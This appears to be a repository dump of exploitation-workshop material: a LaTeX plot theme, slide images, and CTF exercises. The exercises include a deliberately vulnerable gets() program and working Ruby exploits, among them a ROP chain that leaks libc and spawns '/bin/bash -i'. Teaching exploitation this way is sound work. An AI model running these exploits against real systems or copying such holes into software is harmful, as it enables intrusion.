A full list of 10 | %% contributors can be found at 11 | %% 12 | %% https://github.com/matze/mtheme/graphs/contributors 13 | %% 14 | %% and the original template was based on the HSRM theme by Benjamin Weiss. 15 | %% 16 | %% This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 17 | %% International License (https://creativecommons.org/licenses/by-sa/4.0/). 18 | %% --------------------------------------------------------------------------- 19 | \NeedsTeXFormat{LaTeX2e} 20 | \ProvidesPackage{pgfplotsthemetol} 21 | [2015/06/16 PGFplots colors based on Paul Tol's SRON technical note] 22 | \definecolor{TolDarkPurple}{HTML}{332288} 23 | \definecolor{TolDarkBlue}{HTML}{6699CC} 24 | \definecolor{TolLightBlue}{HTML}{88CCEE} 25 | \definecolor{TolLightGreen}{HTML}{44AA99} 26 | \definecolor{TolDarkGreen}{HTML}{117733} 27 | \definecolor{TolDarkBrown}{HTML}{999933} 28 | \definecolor{TolLightBrown}{HTML}{DDCC77} 29 | \definecolor{TolDarkRed}{HTML}{661100} 30 | \definecolor{TolLightRed}{HTML}{CC6677} 31 | \definecolor{TolLightPink}{HTML}{AA4466} 32 | \definecolor{TolDarkPink}{HTML}{882255} 33 | \definecolor{TolLightPurple}{HTML}{AA4499} 34 | \pgfplotscreateplotcyclelist{mbarplot cycle}{% 35 | {draw=TolDarkBlue, fill=TolDarkBlue!70}, 36 | {draw=TolLightBrown, fill=TolLightBrown!70}, 37 | {draw=TolLightGreen, fill=TolLightGreen!70}, 38 | {draw=TolDarkPink, fill=TolDarkPink!70}, 39 | {draw=TolDarkPurple, fill=TolDarkPurple!70}, 40 | {draw=TolDarkRed, fill=TolDarkRed!70}, 41 | {draw=TolDarkBrown, fill=TolDarkBrown!70}, 42 | {draw=TolLightRed, fill=TolLightRed!70}, 43 | {draw=TolLightPink, fill=TolLightPink!70}, 44 | {draw=TolLightPurple, fill=TolLightPurple!70}, 45 | {draw=TolLightBlue, fill=TolLightBlue!70}, 46 | {draw=TolDarkGreen, fill=TolDarkGreen!70}, 47 | } 48 | \pgfplotscreateplotcyclelist{mlineplot cycle}{% 49 | {TolDarkBlue, mark=*, mark size=1.5pt}, 50 | {TolLightBrown, mark=square*, mark size=1.3pt}, 51 | {TolLightGreen, mark=triangle*, mark 
size=1.5pt}, 52 | {TolDarkBrown, mark=diamond*, mark size=1.5pt}, 53 | } 54 | \pgfplotsset{ 55 | compat=1.9, 56 | mlineplot/.style={ 57 | mbaseplot, 58 | xmajorgrids=true, 59 | ymajorgrids=true, 60 | major grid style={dotted}, 61 | axis x line=bottom, 62 | axis y line=left, 63 | legend style={ 64 | cells={anchor=west}, 65 | draw=none 66 | }, 67 | cycle list name=mlineplot cycle, 68 | }, 69 | mbarplot base/.style={ 70 | mbaseplot, 71 | bar width=6pt, 72 | axis y line*=none, 73 | }, 74 | mbarplot/.style={ 75 | mbarplot base, 76 | ybar, 77 | xmajorgrids=false, 78 | ymajorgrids=true, 79 | area legend, 80 | legend image code/.code={% 81 | \draw[#1] (0cm,-0.1cm) rectangle (0.15cm,0.1cm); 82 | }, 83 | cycle list name=mbarplot cycle, 84 | }, 85 | horizontal mbarplot/.style={ 86 | mbarplot base, 87 | xmajorgrids=true, 88 | ymajorgrids=false, 89 | xbar stacked, 90 | area legend, 91 | legend image code/.code={% 92 | \draw[#1] (0cm,-0.1cm) rectangle (0.15cm,0.1cm); 93 | }, 94 | cycle list name=mbarplot cycle, 95 | }, 96 | mbaseplot/.style={ 97 | legend style={ 98 | draw=none, 99 | fill=none, 100 | cells={anchor=west}, 101 | }, 102 | x tick label style={ 103 | font=\footnotesize 104 | }, 105 | y tick label style={ 106 | font=\footnotesize 107 | }, 108 | legend style={ 109 | font=\footnotesize 110 | }, 111 | major grid style={ 112 | dotted, 113 | }, 114 | axis x line*=bottom, 115 | }, 116 | disable thousands separator/.style={ 117 | /pgf/number format/.cd, 118 | 1000 sep={} 119 | }, 120 | } 121 | \endinput 122 | %% 123 | %% End of file `pgfplotsthemetol.sty'. 
124 | -------------------------------------------------------------------------------- /pix/GOT.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/GOT.png -------------------------------------------------------------------------------- /pix/binsh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/binsh.png -------------------------------------------------------------------------------- /pix/bruijn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/bruijn.png -------------------------------------------------------------------------------- /pix/code.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/code.png -------------------------------------------------------------------------------- /pix/crimages/bin-info.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/bin-info.png -------------------------------------------------------------------------------- /pix/crimages/bof1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/bof1.png -------------------------------------------------------------------------------- /pix/crimages/peda_context.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/peda_context.png -------------------------------------------------------------------------------- /pix/crimages/poppopret.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/poppopret.png -------------------------------------------------------------------------------- /pix/crimages/r2_context1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/r2_context1.png -------------------------------------------------------------------------------- /pix/crimages/shellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/crimages/shellcode.png -------------------------------------------------------------------------------- /pix/diff.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/diff.png -------------------------------------------------------------------------------- /pix/exploit_pwn1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/exploit_pwn1.png -------------------------------------------------------------------------------- /pix/exploit_pwn2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/exploit_pwn2.png -------------------------------------------------------------------------------- 
/pix/got.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/got.png -------------------------------------------------------------------------------- /pix/libc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/libc.png -------------------------------------------------------------------------------- /pix/overflow1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/overflow1.png -------------------------------------------------------------------------------- /pix/overflow2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/overflow2.png -------------------------------------------------------------------------------- /pix/overflow3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/overflow3.png -------------------------------------------------------------------------------- /pix/plt_after.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/plt_after.png -------------------------------------------------------------------------------- /pix/plt_before.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/plt_before.png 
-------------------------------------------------------------------------------- /pix/ppp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/ppp.png -------------------------------------------------------------------------------- /pix/pppr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/pppr.png -------------------------------------------------------------------------------- /pix/pwn1_shellcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/pwn1_shellcode.png -------------------------------------------------------------------------------- /pix/pwn2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/pwn2.png -------------------------------------------------------------------------------- /pix/r2-nativedebug.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/r2-nativedebug.png -------------------------------------------------------------------------------- /pix/radiff2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/radiff2.png -------------------------------------------------------------------------------- /pix/regstacklisting.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/regstacklisting.png -------------------------------------------------------------------------------- /pix/rop.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/rop.png -------------------------------------------------------------------------------- /pix/rop_pwn1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/rop_pwn1.png -------------------------------------------------------------------------------- /pix/segfault_pwn1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/segfault_pwn1.png -------------------------------------------------------------------------------- /pix/socat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/socat.png -------------------------------------------------------------------------------- /pix/system_offset.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/system_offset.png -------------------------------------------------------------------------------- /pix/web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/web.png -------------------------------------------------------------------------------- /pix/writable.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/writable.png -------------------------------------------------------------------------------- /pix/you.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pix/you.png -------------------------------------------------------------------------------- /pwns/bof/bof/bof: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pwns/bof/bof/bof -------------------------------------------------------------------------------- /pwns/bof/bof/bof.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | void func(int key){ 5 | char overflowme[32]; 6 | printf("overflow me : "); 7 | gets(overflowme); // smash me! 
8 | if(key == 0xcafebabe){ 9 | system("/bin/sh"); 10 | } 11 | else{ 12 | printf("Nah..\n"); 13 | } 14 | } 15 | int main(int argc, char* argv[]){ 16 | func(0xdeadbeef); 17 | return 0; 18 | } 19 | 20 | -------------------------------------------------------------------------------- /pwns/bof/bof/bof.rr2: -------------------------------------------------------------------------------- 1 | #!/usr/bin/rarun2 2 | program=./bof 3 | stdin=./pattern.txt 4 | -------------------------------------------------------------------------------- /pwns/bof/bof/pattern.txt: -------------------------------------------------------------------------------- 1 | AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAZAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABZABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmABnABoABpABqABrABsABtABuABvABwABxAByABzAB1AB2AB3AB4AB5AB6AB7AB8AB9AB0ACBACCACDACEACFACGACHACIACJACKACLACMACNACOACPACQACRACSACTACUACVACWACZACYACZACaACbACcACdACeACfACgAChACiACjACkAClACmACnACoACpACqACrACsACtACuACvACwACxACyACzAC1AC2AC3AC4AC5AC6AC7AC8AC9AC0ADBADCADDADEADFADGADHADIADJADKADLADMADNADOADPADQADRADSADTADUADVADWADZADYADZADaADbADcADdADeADfADgADhADiADjADkADlADmADnADoADpADqADrADsADtADuADvADwADxADyADzAD1AD2AD3AD4AD5AD6AD7AD8AD9AD0AEBAECAEDAEEAEFAEGAEHAEIAEJAEKAELAEMAENAEOAEPAEQAERAESAETAEUAEVAEWAEZAEYAEZAEaAEbAEcAEdAEeAEfAEgAEhAEiAEjAEkAElAEmAEnAEoAEpAEqAErAEsAEtAEuAEvAEwAExAEyAEzAE1AE2AE3AE4AE5AE6AE7AE8AE9AE0AFBAFCAFDAFEAFFAFGAFHAFIAFJAFKAFLAFMAFNAFOAFPAFQAFRAFSAFTAFUAFVAFWAFZAFYAFZAFaAFbAFcAFdAFeAFfAFgAFhAFiAFjAFkAFlAFmAFnAFoAFpAFqAFrAFsAFtAFuAFvAFwAFxAFyAFzAF1AF2AF3AF4AF5AF6AF7AF8AF9AF0AGBAGCAGDAGEAGFAGGAGHAGIAGJAGKAGLAGMAGNAGOAGPAGQAGRAGSAGTAGUAGVAGWAGZAGYAGZAGaAGbAGcAGdAGeAGfAGgAGhAGiAGjAGkAGlAGmAGnAGoAGpAGqAGrAGsAGtAGuAGvAGwAGxAGyAGzAG1AG2AG3AG4AG5AG6AG7AG8AG9AG0AHBAHCAHDAHEAHFAHGAHHAHIAHJAHKAHLAHMAHNAHOAHPAHQAHRAHSAHTAHUAHVAHWAHZAHY
AHZAHaAHbAHcAHdAHeAHfAHgAHhAHiAHjAHkAHlAHmAHnAHoAHpAHqAHrAHsAHtAHuAHvAHwAHxAHyAHzAH1AH2AH3AH4AH5AH6AH7AH8AH9AH0AIBAICAIDAIEAIFAIGAIHAIIAIJAIKAILAIMAINAIOAIPAIQAIRAISAITAIUAIVAIWAIZAIYAIZAIaAIbAIcAIdAIeAIfAIgAIhAIiAIjAIkAIlAImAInAIoAIpAIqAIrAIsAItAIuAIvAIwAIxAIyAIzAI1AI2AI3AI4AI5AI6AI7AI8AI9AI0AJBAJCAJDAJEAJFAJGAJHAJIAJJAJKAJLAJMAJNAJOAJPAJQAJRAJSAJTAJUAJVAJWAJZAJYAJZAJaAJbAJcAJdAJeAJfAJgAJhAJiAJjAJkAJlAJmAJnAJoAJpAJqAJrAJsAJtAJuAJvAJwAJxAJyAJzAJ1AJ2AJ3AJ4AJ5AJ6AJ7AJ8AJ9AJ0AKBAKCAKDAKEAKFAKGAKHAKIAKJAKKAKLAKMAKNAKOAKPAKQAKRAKSAKTAKUAKVAKWAKZAKYAKZAKaAKbAKcAKdAKeAKfAKgAKhAKiAKjAKkAKlAKmAKnAKoAKpAKqAKrAKsAKtAKuAKvAKwAKxAKyAKzAK1AK2AK3AK4AK5AK6AK7AK8AK9AK0ALBALCALDALEALFALGALHALIALJALKALLALMALNALOALPALQALRALSALTALUALVALWALZALYALZALaALbALcALdALeALfALgALhALiALjALkALlALmALnALoALpALqALrALsALtALuALvALwALxALyALzAL1AL2AL3AL4AL5AL6AL7AL8AL9AL0AMBAMCAMDAMEAMFAMGAMHAMIAMJAMKAMLAMMAMNAMOAMPAMQAMRAMSAMTAMUAMVAMWAMZAMYAMZAMaAMbAMcAMdAMeAMfAMgAMhAMiAMjAMkAMlAMmAMnAMoAMpAMqAMrAMsAMtAMuAMvAMwAMxAMyAMzAM1AM2AM3AM4AM5AM6AM7AM8AM9AM0ANBANCANDANEANFANGANHANIANJANKANLANMANNANOANPANQANRANSANTANUANVANWANZANYANZANaANbANcANdANeANfANgANhANiANjANkANlANmANnANoANpANqANrANsANtANuANvANwANxANyANzAN1AN2AN3AN4AN5AN6AN7AN8AN9AN0AOBAOCAODAOEAOFAOGAOHAOIAOJAOKAOLAOMAONAOOAOPAOQAORAOSAOTAOUAOVAOWAOZAOYAOZAOaAObAOcAOdAOeAOfAOgAOhAOiAOjAOkAOlAOmAOnAOoAOpAOqAOrAOsAOtAOuAOvAOwAOxAOyAOzAO1AO2AO3AO4AO5AO6AO7AO8AO9AO0APBAPCAPDAPEAPFAPGAPHAPIAPJAPKAPLAPMAPNAPOAPPAPQAPRAPSAPTAPUAPVAPWAPZAPYAPZAPaAPbAPcAPdAPeAPfAPgAPhAPiAPjAPkAPlAPmAPnAPoAPpAPqAPrAPsAPtAPuAPvAPwAPxAPyAPzAP1AP2AP3AP4AP5AP6AP7AP8AP9AP0AQBAQCAQDAQEAQFAQGAQHAQIAQJAQKAQLAQMAQNAQOAQPAQQAQRAQSAQTAQUAQVAQWAQZAQYAQZAQaAQbAQcAQdAQeAQfAQgAQhAQiAQjAQkAQlAQmAQnAQoAQpAQqAQrAQsAQtAQuAQvAQwAQxAQyAQzAQ1AQ2AQ3AQ4AQ5AQ6AQ7AQ8AQ9AQ0ARBARCARDAREARFARGARHARIARJARKARLARMARNAROARPARQARRARSARTARUARVARWARZARYARZARaARbARcARdAReARfARgARhARiARjARkARlARmARnARoARpARqARrARsARtARuARvARwARxARyARzAR1AR2AR3AR4AR5AR6AR7AR8AR9AR0ASBASCASDASEASFASGASHASIASJASKASLASMASNASOASPASQASRASSASTAS
UASVASWASZASYASZASaASbAScASdASeASfASgAShASiASjASkASlASmASnASoASpASqASrASsAStASuASvASwASxASyASzAS1AS2AS3AS4AS5AS6AS7AS8AS9AS0ATBATCATDATEATFATGATHATIATJATKATLATMATNATOATPATQATRATSATTATUATVATWATZATYATZATaATbATcATdATeATfATgAThATiATjATkATlATmATnAToATpATqATrATsATtATuATvATwATxATyATzAT1AT2AT3AT4AT5AT6AT7AT8AT9AT0AUBAUCAUDAUEAUFAUGAUHAUIAUJAUKAULAUMAUNAUOAUPAUQAURAUSAUTAUUAUVAUWAUZAUYAUZAUaAUbAUcAUdAUeAUfAUgAUhAUiAUjAUkAUlAUmAUnAUoAUpAUqAUrAUsAUtAUuAUvAUwAUxAUyAUzAU1AU2AU3AU4AU5AU6AU7AU8AU9AU0AVBAVCAVDAVEAVFAVGAVHAVIAVJAVKAVLAVMAVNAVOAVPAVQAVRAVSAVTAVUAVVAVWAVZAVYAVZAVaAVbAVcAVdAVeAVfAVgAVhAViAVjAVkAVlAVmAVnAVoAVpAVqAVrAVsAVtAVuAVvAVwAVxAVyAVzAV1AV2AV3AV4AV5AV6AV7AV8AV9AV0AWBAWCAWDAWEAWFAWGAWHAWIAWJAWKAWLAWMAWNAWOAWPAWQAWRAWSAWTAWUAWVAWWAWZ -------------------------------------------------------------------------------- /pwns/bof/bof/profile: -------------------------------------------------------------------------------- 1 | r2 -de dbg.profile=bof.rr2 bof 2 | -------------------------------------------------------------------------------- /pwns/bof/bof/pwn.rb: -------------------------------------------------------------------------------- 1 | require_relative 'shoe' 2 | s = Shoe.new "pwnable.kr", 9000 3 | offset = `ragg2 -q 0x41534141`.split("\n")[0].split(" ")[2].to_i 4 | pwn = "A" * offset + [0xcafebabe].pack("V") 5 | s.say pwn 6 | s.tie! 7 | -------------------------------------------------------------------------------- /pwns/bof/bof/shoe.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | require 'timeout' 3 | require 'rolling_timeout' 4 | 5 | class Shoe < TCPSocket 6 | def recv_until str 7 | buf = "" 8 | until buf.end_with? 
str do 9 | buf << self.recv(1) 10 | end 11 | buf 12 | end 13 | 14 | def recv_until_re regex 15 | buf = "" 16 | while not regex.match buf 17 | buf << self.recv(1) 18 | end 19 | buf 20 | end 21 | 22 | def say str 23 | self.send str, 0 24 | end 25 | 26 | def read_n_seconds secs 27 | # requires native threads. 28 | # doesn't work with ruby 1.8.x or lower 29 | buf = "" 30 | begin 31 | timeout(secs) do 32 | loop { 33 | buf << self.recv(1) 34 | } 35 | end 36 | rescue Timeout::Error 37 | end 38 | buf 39 | end 40 | 41 | def read_til_end timeout 42 | # timeout is time between chars 43 | buf = "" 44 | begin 45 | RollingTimeout.new(timeout) { |timer| 46 | loop { 47 | buf << self.recv(1) 48 | timer.reset 49 | } 50 | } 51 | rescue Timeout::Error 52 | end 53 | buf 54 | end 55 | 56 | def tie! 57 | # kick off a thread just reading forever 58 | Thread.new { loop { $stdout.write(self.recv(4096)) } } 59 | str = "" 60 | loop { 61 | ch = $stdin.read_nonblock(1) rescue nil 62 | if ch == nil 63 | next 64 | end 65 | self.send ch, 0 66 | } 67 | end 68 | end 69 | -------------------------------------------------------------------------------- /pwns/bof/bof/slide.txt: -------------------------------------------------------------------------------- 1 | finding offset into buffer 2 | 3 | de bruijn pattern (cyclic pattern, can find offset) 4 | made popular by metasploit/peda 5 | 6 | r2 has this feature 7 | 8 | bof - pwnablekr 9 | set dword to magic value 10 | 11 | ragg2 -P -r # generate pattern. 12 | debug profile can set args/stdin/etc, so we can set inputs 13 | 14 | r2 -de dbg.profile=bof.rr2 bof 15 | dcu sym.func 16 | db (check address) 17 | 0xf779b654 b 817d08bebafe. cmp dword [ebp + 8], 0xcafebabe ; [0xcafebabe:4]=-1 18 | dc 19 | 20 | drr = show registers with context. 
notice that ebp + 8 points somewhere into our string, 21 | find the offset of this 22 | 23 | pxr 4 @ ebp + 8 # print hex with references 24 | 25 | [0xf779b62c]> pxr 4 @ ebp + 8 26 | 0xffebbd10 0x41534141 AASA ascii 27 | 28 | now we know what it points to; finding the offset is simple! 29 | [0xf779b62c]> woO 0x41534141 30 | 52 31 | 32 | so ebp + 8 points 52 bytes into the buffer. 33 | -------------------------------------------------------------------------------- /pwns/magic/demo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | int is_libc_line(char* line) { 8 | regex_t regex; 9 | int ret; 10 | int reti; 11 | char msgbuf[100]; 12 | 13 | /* Compile regular expression */ 14 | reti = regcomp(&regex, "libc-[[:digit:]].[[:digit:]][[:digit:]].so", 0); 15 | if( reti ){ fprintf(stderr, "Could not compile regex\n"); exit(1); } 16 | 17 | /* Execute regular expression */ 18 | reti = regexec(&regex, line, 0, NULL, 0); 19 | if( !reti ){ 20 | ret = 1; 21 | } 22 | else if( reti == REG_NOMATCH ){ 23 | ret = 0; 24 | } 25 | else{ 26 | regerror(reti, &regex, msgbuf, sizeof(msgbuf)); 27 | fprintf(stderr, "Regex match failed: %s\n", msgbuf); 28 | exit(1); 29 | } 30 | /* Free compiled regular expression if you want to use the regex_t again */ 31 | regfree(&regex); 32 | 33 | return ret; 34 | } 35 | 36 | intptr_t get_base_addr() { 37 | FILE * fp; 38 | char * line = NULL; 39 | size_t len = 0; 40 | ssize_t read; 41 | int matched = 0; 42 | intptr_t libc_base = 0; 43 | 44 | fp = fopen("/proc/self/maps", "r"); 45 | if (fp == NULL) 46 | exit(EXIT_FAILURE); 47 | 48 | while ((read = getline(&line, &len, fp)) != -1) { 49 | matched = is_libc_line (line); 50 | if (matched) { 51 | libc_base = strtoull(line, NULL, 16); 52 | break; 53 | } 54 | } 55 | 56 | fclose(fp); 57 | if (line) free(line); 58 | return libc_base; 59 | } 60 | 61 | int main(int argc, char** argv) { 62 | setvbuf(stdout, NULL, _IONBF, 0); 63 | intptr_t 
libc_base = get_base_addr (); 64 | printf("libc base addr - %p\n", (void*)libc_base); 65 | unsigned long long input_value; 66 | printf("where should I jump to [base 10]? "); 67 | scanf("%llu", &input_value); 68 | void (*func_ptr)(void) = (void (*)(void))input_value; 69 | asm __volatile__ ("xor %rsi, %rsi;"); 70 | asm __volatile__ ("push %rsi"); 71 | func_ptr(); 72 | } 73 | -------------------------------------------------------------------------------- /pwns/magic/pwn.rb: -------------------------------------------------------------------------------- 1 | require_relative 'shoe' 2 | s = Shoe.new "localhost", 8888 3 | blah = s.read_n_seconds 0.5 4 | rce = blah.split[4].hex + 0x000f170d 5 | s.say "#{rce}\n" 6 | s.tie! 7 | -------------------------------------------------------------------------------- /pwns/magic/shoe.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | require 'timeout' 3 | require 'rolling_timeout' 4 | 5 | class Shoe < TCPSocket 6 | def recv_until str 7 | buf = "" 8 | until buf.end_with? str do 9 | buf << self.recv(1) 10 | end 11 | buf 12 | end 13 | 14 | def recv_until_re regex 15 | buf = "" 16 | while not regex.match buf 17 | buf << self.recv(1) 18 | end 19 | buf 20 | end 21 | 22 | def say str 23 | self.send str, 0 24 | end 25 | 26 | def read_n_seconds secs 27 | # requires native threads. 28 | # doesn't work with ruby 1.8.x or lower 29 | buf = "" 30 | begin 31 | timeout(secs) do 32 | loop { 33 | buf << self.recv(1) 34 | } 35 | end 36 | rescue Timeout::Error 37 | end 38 | buf 39 | end 40 | 41 | def read_til_end timeout 42 | # timeout is time between chars 43 | buf = "" 44 | begin 45 | RollingTimeout.new(timeout) { |timer| 46 | loop { 47 | buf << self.recv(1) 48 | timer.reset 49 | } 50 | } 51 | rescue Timeout::Error 52 | end 53 | buf 54 | end 55 | 56 | def tie! 
57 | # kick off a thread just reading forever 58 | Thread.new { loop { $stdout.write(self.recv(4096)) } } 59 | str = "" 60 | loop { 61 | ch = $stdin.read_nonblock(1) rescue nil 62 | if ch == nil 63 | next 64 | end 65 | self.send ch, 0 66 | } 67 | end 68 | end 69 | -------------------------------------------------------------------------------- /pwns/rop/pwn.rb: -------------------------------------------------------------------------------- 1 | require_relative 'shoe' 2 | require 'r2pipe' 3 | require 'json' 4 | require 'pry' 5 | 6 | def get_symbol_addr json, name 7 | json.each{|i| 8 | if i["name"] == name 9 | return i["vaddr"] 10 | end 11 | } 12 | end 13 | 14 | # open up a r2pipe to our binary, and to libc 15 | r2pbin = R2Pipe.new "./ropasaurusrex" 16 | r2plibc = R2Pipe.new "/lib/i386-linux-gnu/libc.so.6" 17 | 18 | # get symbols from binary and libc 19 | binsyms = JSON.parse(r2pbin.cmd("isj")) 20 | binreloc = JSON.parse(r2pbin.cmd("iRj")) 21 | libcsyms = JSON.parse(r2plibc.cmd("isj")) 22 | 23 | # resolve symbols from the binary 24 | read_plt = get_symbol_addr binsyms, "imp.read" 25 | write_plt = get_symbol_addr binsyms, "imp.write" 26 | read_got = get_symbol_addr binreloc, "read" 27 | 28 | # find the pppr 29 | r2pbin.cmd("e rop.len = 4") 30 | pppr = r2pbin.cmd('"/R/ pop;pop;pop;ret"').split[0].hex 31 | 32 | # find the libc system and read addresses 33 | system_libc = get_symbol_addr libcsyms, "system" 34 | read_libc = get_symbol_addr libcsyms, "read" 35 | 36 | # this is hard coded in... r2 isnt magic 37 | vuln_addr = 0x080483F4 38 | 39 | # find a place to write 40 | segments = JSON.parse(r2pbin.cmd("iSj")) 41 | command = "/bin/bash -i 2>&1" 42 | target_size = command.size + 1 # big enough for our command to write in 43 | target_perm = "w" # we need writeable 44 | target_addr = 0 45 | segments.each{|i| 46 | if i["flags"].include? 
target_perm and i["size"] >= target_size 47 | target_addr = i["vaddr"] 48 | break 49 | end 50 | } 51 | 52 | s = Shoe.new "localhost", 8888 53 | 54 | padding_len = r2pbin.cmd("woO 0x41417641").to_i # found this already in debugger 55 | stage1 = "A" * padding_len 56 | stage1 = stage1 + [write_plt, pppr, 1, read_got, 4].pack("V*") 57 | stage1 = stage1 + [read_plt, pppr, 0, target_addr, command.size + 1].pack("V*") 58 | stage1 = stage1 + [vuln_addr].pack("V*") 59 | s.say "#{stage1}" 60 | sleep 0.1 61 | s.say command + "\x00" 62 | sleep 0.1 63 | leak = s.recv(4).unpack("V")[0] 64 | libc_base = leak - read_libc 65 | resolved_system = libc_base + system_libc 66 | stage2 = "A" * padding_len 67 | stage2 = stage2 + [resolved_system, 0x11111111, target_addr].pack("V*") 68 | s.say "#{stage2}" 69 | s.tie! 70 | -------------------------------------------------------------------------------- /pwns/rop/ropasaurusrex: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/pwns/rop/ropasaurusrex -------------------------------------------------------------------------------- /pwns/rop/shoe.rb: -------------------------------------------------------------------------------- 1 | require 'socket' 2 | require 'timeout' 3 | require 'rolling_timeout' 4 | 5 | class Shoe < TCPSocket 6 | def recv_until str 7 | buf = "" 8 | until buf.end_with? str do 9 | buf << self.recv(1) 10 | end 11 | buf 12 | end 13 | 14 | def recv_until_re regex 15 | buf = "" 16 | while not regex.match buf 17 | buf << self.recv(1) 18 | end 19 | buf 20 | end 21 | 22 | def say str 23 | self.send str, 0 24 | end 25 | 26 | def read_n_seconds secs 27 | # requires native threads. 
